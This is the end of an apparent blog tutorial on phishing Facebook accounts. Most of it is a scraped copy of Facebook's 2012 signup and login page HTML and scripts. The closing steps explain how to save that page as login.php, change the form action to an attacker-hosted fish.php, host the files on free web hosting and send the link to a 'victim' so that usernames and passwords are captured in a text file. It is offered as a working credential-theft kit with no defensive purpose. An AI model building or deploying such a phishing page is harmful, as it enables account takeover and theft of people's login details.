src="https://s-static.ak.facebook.com/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span></div></div><div id="reg_captcha" style="display: none"><div><h2 id="security_check_header">Security Check</h2><div id="outer_captcha_box"><div id="captcha_box"><div class="field_error" id="captcha_response_error" style="display:none;">This field is required.</div><div id="captcha" class="captcha"><input type="hidden" autocomplete="off" id="captcha_persist_data" name="captcha_persist_data" value="AZlvuO2b9D_omM9FffgT01Jb9K5xmVPvlA87debpbW3I7picuyBRqmvObKpihpAT5iqdqkjtyryvaHtn8gi9m9RjqV3Bnz42UwmOXjfi4i1lzKxopeZZSe3TpPnXqMJodI4Oo54IeX639kn5oF_gS3YmSNVkPX6wvcoWDEDubeEfKnkYku-LKSL2gsBv7nd6yPLv_w0EH9Mec_9NI8SkUPvWGh1EnJ3C1aAlbQWSyONDmCeDZa0KXy0a-gFBRFdeRn0doIp8aQXpZ74AzdLtYArARSzRPXemTFaA7SpRaMoBvC0dIzWRbdkKjmhUkOFp4lwLcazSqcw7ui67Z0LerSYO0Fa0mm1L3ZE_3W4H48onKw" /><div><div id="recaptcha_scripts" style="display:none"></div><input type="hidden" autocomplete="off" id="captcha_session" name="captcha_session" value="dFpbmBMPSSai6iFVt1-9bQ" /><input type="hidden" autocomplete="off" id="extra_challenge_params" name="extra_challenge_params" value="authp=nonce.tt.time.new_audio_default&amp;psig=fZH9CuK6dZIkjRrSEZW0nF1UCEY&amp;nonce=dFpbmBMPSSai6iFVt1-9bQ&amp;tt=AJ1DZyqv1-KMf8LqPqjACgaMhPA&amp;time=1347142295&amp;new_audio_default=1" /><input type="hidden" autocomplete="off" id="recaptcha_type" name="recaptcha_type" value="password" /><div class="recaptcha_text"><div class="recaptcha_only_if_image">Enter both words below, separated by a space.<br />Can't read the words below? <a href="#" onclick="Recaptcha.reload(); return false" id="recaptcha_reload_btn">Try different words</a> or <a href="#" onclick="Recaptcha.switch_type(&quot;audio&quot;); return false;">an audio captcha</a>.</div><div class="recaptcha_only_if_audio" style="display:none">Please enter the words or numbers you hear.<br /><a href="#" onclick="Recaptcha.reload(); return false" id="recaptcha_reload_btn">Try different words</a> or <a class="recaptcha_only_if_audio" href="#" onclick="Recaptcha.switch_type(&quot;image&quot;); return false;">back to text</a>.</div></div><span id="recaptcha_play_audio"></span><div class="audiocaptcha"></div><div id="recaptcha_image" class="captcha_image"></div><div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="https://s-static.ak.facebook.com/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif" alt="" style="height:11px;width:16px;" /></div></div><div class="captcha_input"><label>Text in the box:</label><div class="field_container"><input type="text" name="captcha_response" id="captcha_response" autocomplete="off" aria-label="Captcha input. Type the words listed above to continue. Additionally you may also try the audio captcha by clicking the link above." /></div><a class="mlm" href="#" onclick="CSS.show($(&#039;captcha_whats_this&#039;)); return false;">What's this?</a><div id="captcha_whats_this" class="hidden_elem"><div class="fsl fwb">Security Check</div>This is a standard security test that we use to prevent spammers from creating fake accounts and spamming users.</div></div></div></div></div><div><div class="gridCol"></div><div class="gridCol"></div></div><div id="captcha_buttons" class="clearfix" style="display: none;"><div id="back_button" class="gridCol"><div class="cancel_button_image">   </div><a id="cancel_button" href="#" onclick="return run_with(this, [&quot;registration&quot;], function() &#123;Registration.getInstance().hide_captcha();Registration.getInstance().show_reg_form();&#125;);">Back</a></div><div id="A_btn_sign_up" class="gridCol"><div class="reg_btn clearfix"><label class="big_input uiButton uiButtonSpecial" for="u9qnpz_2"><input value="Sign Up" onclick="setFormTypeABTest($(&quot;reg&quot;)); Registration.getInstance().validateForm();" type="submit" id="u9qnpz_2" /></label><span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="https://s-static.ak.facebook.com/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span></div></div></div></div></div></form><div id="reg_progress" style="display: none"><div id="progress_wrap"><img class="img" src="https://s-static.ak.facebook.com/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">Registering…</div></div></div><div id="reg_error" class="hidden_elem"><div id="reg_error_inner">An error occurred. Please try again.</div></div><div id="tos_container" class="tos_container"><p class="legal_tos hidden_elem">By clicking Sign Up, you are indicating that you have read and agree to the <a href="/legal/terms" target="_blank" rel="nofollow">Terms of Use</a> and <a href="/policy.php" target="_blank" rel="nofollow">Privacy Policy</a>.</p></div><div id="reg_pages_msg" class="pagesSection pagesSectionPPT"><a href="/pages/create.php">Create a Page</a> for a celebrity, band or business.</div></div></div></div></div></div></div></div></div><div class="mtm locales"><ul class="uiList uiListHorizontal clearfix localeSelectorList"><li class="uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="English (US)">English (US)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Spanish">Español</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Portuguese (Brazil)">Português (Brasil)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="French (France)">Français (France)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="German">Deutsch</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;it_IT&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Italian">Italiano</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="rtl" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Arabic">العربية</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Hindi">हिन्दी</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Simplified Chinese (China)">中文(简体)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/" onclick="intl_set_cookie_locale(&quot;ja_JP&quot;, &quot;https:\/\/www.facebook.com\/&quot;);" title="Japanese">日本語</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a class="showMore" rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2F&amp;source=TOP_LOCALES_DIALOG" title="Show more languages">…</a></li></ul></div></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div class="mrl lfloat" role="contentinfo"><div class="fsm fwn fcg"><span> Facebook © 2012</span> · <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2F" title="Use Facebook in another language.">English (US)</a></div></div><div class="navigation fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile/?ref=pf" title="Check out Facebook Mobile.">Mobile</a> · <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> · <a href="http://www.facebook.com/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> · <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> · <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> · <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> · <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Create an Ad</a> · <a href="http://www.facebook.com/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> · <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> · <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> · <a href="http://www.facebook.com/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a> · <a href="http://www.facebook.com/help/cookies" title="Learn about cookies and Facebook.">Cookies</a> · <a href="http://www.facebook.com/policies/?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a> · <a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=9566"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 ");}catch(e){si_cj("1 \t");window.document.write("\u003Cstyle>body * {display:none !important;}\u003C\/style>\u003Ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">\u003Ci class=\"img sp_alyv65 sx_d71ec2\" style=\"display:block !important\">\u003C\/i>Go to Facebook.com\u003C\/a>");/*vfPeNO3v*/}}/*]]>*/</script>
<script>Bootloader.setResourceMap({"aPQag":{"type":"css","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y-\/r\/2Di1EoTs3fh.css"},"CKjkI":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/ye\/r\/VvnPQrsVPGy.css"},"VuNPD":{"type":"css","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yY\/r\/u8iA3kXb8Y1.css"},"D72lJ":{"type":"css","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y0\/r\/8e04id9zUP-.css"},"4UU98":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y3\/r\/mStS-SbjQcM.css"},"FVdSs":{"type":"css","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yX\/r\/p5uLIXSrMsc.css"},"X\/Fq6":{"type":"css","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y6\/r\/YlbIHaln_Rk.css"},"1r83y":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y4\/r\/c0nuYDtjcK_.css"},"VDymv":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y9\/r\/JViztkIFxMP.css"}});Bootloader.setResourceMap({"wYiXB":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y_\/r\/4U8qWwwDoch.js"},"v\/fk3":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yC\/r\/CSdQSfvx-Bg.js"},"CI04j":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y8\/r\/K4V2zbf3AVj.js"},"XLY1C":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yQ\/r\/Gl8LWuQ7PPV.js"},"XxMBO":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yw\/r\/sLpEDf_TYdu.js"},"oE4Do":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yD\/r\/65c9OW-i481.js"},"\/K81D":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yl\/r\/cwMSzldh79l.js"},"mxEQB":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yQ\/r\/SKO5skPJpGS.js"},"cNca2":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yT\/r\/7YVta2ViNbr.js"},"IumlO":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yu\/r\/VHKHQz5pKwS.js"},"bwsMw":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yi\/r\/5VR2mwxDrFF.js"},"Pwdic":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/ys\/r\/mYyRPQO3edn.js"},"lmO1j":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yb\/r\/-SjH94w7Sn3.js"},"DdrkA":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y-\/r\/MQQA3wbFwJV.js"},"zyFOp":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y4\/r\/61VSNDvRJnS.js"},"B\/20C":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yS\/r\/7R-5iAeFQ-m.js"},"2ma5f":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yo\/r\/hCn6u3fXLtg.js"},"wxq+C":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/yO\/r\/tDoIL-c0Ozp.js"},"DZmeF":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y2\/r\/ZeZFU7zHXuC.js"},"H42Jh":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y3\/r\/ppwOo4BAmlb.js"},"AtxWD":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y1\/r\/fvXyHGM5qlP.js"},"U+491":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y8\/r\/49TSJ4U9UBQ.js"},"bs0gy":{"type":"js","src":"https:\/\/s-static.ak.fbcdn.net\/rsrc.php\/v2\/y9\/r\/KamU7KNCYdj.js"}});
Bootloader.enableBootload({"legacy:async-signal":{"resources":["CI04j"]},"editor":{"resources":["CI04j","wYiXB","XxMBO"]},"ConfirmationDialog":{"resources":["CI04j","wYiXB","oE4Do"],"module":true},"Dialog":{"resources":["CI04j","wYiXB","CKjkI"],"module":true},"registration":{"resources":["CI04j","wYiXB","XxMBO","aPQag","v\/fk3","\/K81D"]},"IframeShim":{"resources":["CI04j","wYiXB","mxEQB"],"module":true},"ErrorSignal":{"resources":["CI04j","wYiXB","cNca2"],"module":true},"event-extensions":{"resources":["CI04j"],"module":true},"AsyncDialog":{"resources":["CI04j","wYiXB","CKjkI"],"module":true},"FbdDialogProvider":{"resources":["IumlO","CI04j","bwsMw"],"module":true},"React":{"resources":["Pwdic","lmO1j"],"module":true},"AsyncRequest":{"resources":["CI04j","wYiXB"],"module":true},"PhotoSnowlift":{"resources":["CI04j","wYiXB","CKjkI"],"module":true},"VaultBox":{"resources":["CI04j","wYiXB","4UU98","DdrkA","CKjkI","FVdSs"],"module":true},"SpotlightShareViewer":{"resources":["CI04j","wYiXB","X\/Fq6","zyFOp"],"module":true},"PhotoTagger":{"resources":["CI04j","wYiXB","CKjkI","DdrkA"],"module":true},"fb-photos-snowlift-css":{"resources":["1r83y","CKjkI"]},"Live":{"resources":["CI04j","wYiXB","B\/20C"],"module":true},"PhotoTagApproval":{"resources":["CI04j","wYiXB","DdrkA"],"module":true},"PhotoTags":{"resources":["CI04j","wYiXB","CKjkI","DdrkA"],"module":true},"TagTokenizer":{"resources":["CI04j","wYiXB","DdrkA","CKjkI"],"module":true},"fb-photos-snowlift-fullscreen-css":{"resources":["VDymv"]},"PhotoPivot":{"resources":["CI04j","wYiXB","CKjkI","2ma5f"],"module":true},"SnowliftPicCropper":{"resources":["CI04j","wYiXB","CKjkI","4UU98","DdrkA","wxq+C"],"module":true},"PhotosButtonTooltips":{"resources":["CI04j","wYiXB","CKjkI","DZmeF"],"module":true},"VideoRotate":{"resources":["CI04j","wYiXB","H42Jh"],"module":true},"AsyncResponse":{"resources":["wYiXB"],"module":true},"PhotoInlineEditor":{"resources":["CI04j","wYiXB","CKjkI","DdrkA","AtxWD"],"module":true},"Form":{"resources":["CI04j","wYiXB"],"module":true},"DOMScroll":{"resources":["CI04j","wYiXB"],"module":true},"Toggler":{"resources":["CI04j","wYiXB","CKjkI"],"module":true},"Tooltip":{"resources":["CI04j","wYiXB","CKjkI"],"module":true},"DOM":{"resources":["CI04j"],"module":true},"Input":{"resources":["CI04j","wYiXB"],"module":true},"trackReferrer":{"resources":[],"module":true},"DimensionTracking":{"resources":["CI04j"],"module":true},"detect-broken-proxy-cache":{"resources":["CI04j"]},"link-rel-preload":{"resources":["CI04j"]},"legacy:dialog":{"resources":["CI04j","wYiXB","CKjkI"]},"legacy:ajaxpipe":{"resources":["CI04j","wYiXB","U+491"]},"legacy:async":{"resources":["CI04j","wYiXB"]},"legacy:PhotoSnowlift":{"resources":["CI04j","wYiXB","CKjkI","bs0gy"]},"legacy:Toggler":{"resources":["CI04j","wYiXB","CKjkI"]}});</script>
<script>
Bootloader.configurePage(["aPQag","CKjkI","VuNPD","D72lJ"]);
Bootloader.done(["jDr+c"]);


new (require("ServerJS"))().handle({"elements":[["m229547_2","login_form",2],["m229547_3","loginbutton",2],["m229547_4","login_form",2],["m229544_1","reg",2]],"define":[["BanzaiConfig",[],{"MAX_SIZE":10000,"MAX_WAIT":60000,"COMPRESSION_THRESHOLD":800,"gks":{"jslogger":true,"useraction":true}}]],"require":[["PixelRatio","startDetecting",[],[1]],["FlipDirectionOnKeypress"],["Intl","setPhonologicalRules",[],[{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/e":"mb_strtolower(\"\u0001$1\u0001\")","\/\\^\\x01([^\\x01])(?=[^\\x01]*\\x01)\/e":"mb_strtoupper(\"\u0001$1\")","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}}]],["PostLoadJS","loadAndRequire",[],["DimensionTracking"]],["userAction","setUATypeConfig",[],[{"uan":false,"uai":false,"uad":false,"uae":false}]],["ScriptPathState","setUserURISampleRate",[],[0.0002]],["userAction","setCustomSampleConfig",[],[{"uan":{"test":{"test":true}}}]],["UserActionHistory"],["LoginFormController","init",["m229547_2","m229547_3"],[{"__m":"m229547_2"},{"__m":"m229547_3"}]],["TinyViewport"],["WebStorageMonster","schedule",[],[false]],["InitialJSLoader","loadOnDOMContentReady",[],[["wYiXB","v\/fk3","CI04j","XLY1C"]]]]});

onloadRegister_DEPRECATED(function (){useragentcm();});
onloadRegister_DEPRECATED(function (){
      if (typeof RegUtil == 'undefined') {
        RegUtil = function() {};
      }
      RegUtil.captcha_class="ReCaptchaCaptcha";
      RegUtil.recaptcha_public_key="6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL";
      });
onloadRegister_DEPRECATED(function (){RegistrationBootloader.init("registration_container", true, "reg", "form_focus", "https:\/\/www.facebook.com\/ajax\/register.php");});
onloadRegister_DEPRECATED(function (){startFormTypeABTester($("reg"))});
onloadRegister_DEPRECATED(function (){$("u9qnpz_3").value = tz_calculate(1347142295)});
onloadRegister_DEPRECATED(function (){try { $("email").focus(); } catch (_ignore) { }});
onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0", "c_user") });});
onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["link-rel-preload"], function(){ link_rel_preload() });});
</script>
<script>var bigPipe = new (require('BigPipe'))({"lid":0,"forceFinish":true});</script>

<script>bigPipe.onPageletArrive({"phase":0,"id":"first_response","is_last":true,"css":["aPQag","CKjkI","VuNPD","D72lJ"],"js":["wYiXB","v\/fk3","CI04j","XLY1C"]})</script>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

<script>bigPipe.onPageletArrive({"phase":1,"id":"","is_last":true,"the_end":true,"css":["aPQag","CKjkI","VuNPD","D72lJ"],"js":["wYiXB","v\/fk3","CI04j","XLY1C"],"tti_phase":1})</script>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     </body></html>
Save it in a new notepad just like login.php .
Note :-U must edit this section .Just Type ctrl+F & replace the lik. action="https://www.facebook.com/login.php?login_attempt=1 . It will be http://www.yourusername.my3gb.com/fish.php .And also replace method Section.method="post .It will be method=get . 
U can also Download The package.
Step 2:- Now you’ll have to upload all above files on webhosting, So for this you can create a free account on any free web-hosting site.Here is some free web-hosting site.Signup easyly & Host your File. My3gb, 110MB , Drivehq , 00webhost ,Zymic Etc.
Step 3:-Now you can send login.php file link to your victim.When victim will try login your your fake login page then u got him/her username & password a new text file in your hosting site. 

Related Posts Plugin for WordPress, Blogger...